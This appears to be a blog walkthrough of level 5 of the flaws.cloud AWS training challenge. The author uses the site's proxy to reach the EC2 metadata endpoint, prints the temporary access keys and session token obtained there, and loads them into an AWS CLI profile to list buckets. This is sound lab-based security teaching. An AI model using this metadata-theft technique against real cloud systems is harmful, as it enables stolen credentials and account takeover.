Open in app

Sign in

Write

Sign in

flaws.cloud walkthrough | AWS penetration testing — Level-5

Kapil Verma
Dec 21, 2021

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/

http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/

So, Well, I tried to access the /proxy/169.254.169.254/ to get the meta data, I was able to browse to a lot of hidden folders and sub folders.

One of them looked to juicy.

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance

Access Key Id : ASIA6GG7PSQG6KEM6E7Z
Secret Access Key : NGMKgOhkI8D3jRu7dCYDepbXWD2hFsO3bQtkp1Ha

Also, One more URL,

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws

AccessKeyId: ASIA6GG7PSQGX6E6CVXK
SecretAccessKey : f05WRER50vm160b87ar+wJnoVxz1O9gv+nD/CTVg"IQoJb3JpZ2luX2VjEBkaCXVzLXdlc3QtMiJIMEYCIQD0vQGHfRTfbhYS45RXeS2qHgvcHqBfMHCUsVxVIliGJAIhAIC6U+3FVK4nLsGOCrxdySdmIXd7Bwl4OrDWB7PUpEEkKvoDCBIQAhoMOTc1NDI2MjYyMDI5IgyD2M/YMtmQ3wM33EQq1wNGB/xjwP31JRwz9LXBLugsaMYAwilFoshDoC2R9IXXQeuS6jJGQ4AwrLSnsFdCVT92TFe1bI+WDcAN/+ucF4ehCwgPQ4vcszfjaLmsINsgSlC6rVw8s0Mp0FTc4PcR9wMbb28l5a1wLa3d7/MgoUVLjw4/ayVz1c6Huur6ege693jRoFTbaMC73V91uDiQoRkAQWjAhWF7EG/G5cpYKCFgRfSLc2dz4tKAqYytLyzovrvI+bZRjALEDBXiUVMywJ/W0Yn+LVVPzHeNg+fDnC51FKfGbljBnycDnBIQPO319jq2IQDD+p8ebmATfCqTw4DsAEUYtY9JCgWU8nLGMYZFm8g2gzU631anypF+tBu81wqGFdDD8ahjrg5l9mrmlJUhQbFg1w91UbsDy2iUlYzeT+F5ug+oy2rtehSiD5FH1Uc9qGpoom2ewEMYZUcMhLjnUxQHJOuKBmsqGbil7ZkiRPKETMq9S664e3IrptNRgJAfEU109wFivm9MmW9nXXmRin70R6/fXkbVOB/GPFpM6dwYyO0pQ+ZZjFqzB+brkObeuViZCYQpOOONiEWjNBrAbEIg9hxsvrbh/Wnr0Z+sNau9r1wb3cSbt0fwY2zPpxksTH9H4Vgwp6+GjgY6pAHg5VVUCv79+DLvnRhwfZSzYseXtZSfo14HhSjpvX91AFrIxO+oUjrHapojQ22HeV60QJf7ij0k2W2cZsHORGiIQqU2WHyYZG1j7/pJNsCKC+0uBCu65UsiZmOI3BGgztWK9bIPnOxQgaTMIRp80y1u5flfZPjAFe2/gQv1PcbMCbnrwnKwoWhurGI3o2gDAtaEFy/QkdcqCeou4mT+M0spokh26Q==",
  "Expiration" : "2021-12-21T15:22:46Z"

Now after the configure profile command from the aws-shell

Command: aws configure — profile level3

Now, from the .aws folder in the user/(youruser)/.aws directory edit the credentials file and add the aws_sesssion_token = the token you just got above.

Now let’s try to see the s3 buckets.

Now, just copy the directory ddcc78ff/ and append it after the level 6 URL.

Bingo We’re at level 6

Aws Penetration Testing
Flaws Cloud
Flaws Cloud Walkthroiugh
Flaws Cloud Hints
Flaws Cloud Help

--

--

Kapil Verma

Written by Kapil Verma

348 Followers

Security researcher, Blogger, Bug Bounty hunter

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams